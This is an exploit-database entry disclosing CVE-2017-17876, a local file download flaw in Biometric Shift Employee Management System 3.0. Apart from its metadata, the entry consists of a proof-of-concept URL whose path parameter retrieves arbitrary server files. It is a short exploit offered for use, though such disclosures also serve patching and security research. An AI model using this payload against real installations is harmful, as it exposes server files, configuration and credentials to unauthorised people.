id: 29305
date: 12/27/2017
title: Biometric Shift Employee Management System 3.0 - Local File Disclosure Vulnerability
author: Ihsan Sencan
cves: CVE-2017-17876

# # # # #
# Exploit Title: Biometric Shift Employee Management System 3.0 - Local File Download
# Dork: N/A
# Date: 24.12.2017
# Vendor Homepage: https://www.shiftsystems.net/
# Software Link: https://codecanyon.net/item/white-label-shift-employee-management-system/21061908
# Version: 3.0 
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17876
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker download local files....
#
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?user=download?name=VerAyari.Ver&path=[FILE]
# 
# # # # #

#  0day.today [2023-03-23]  #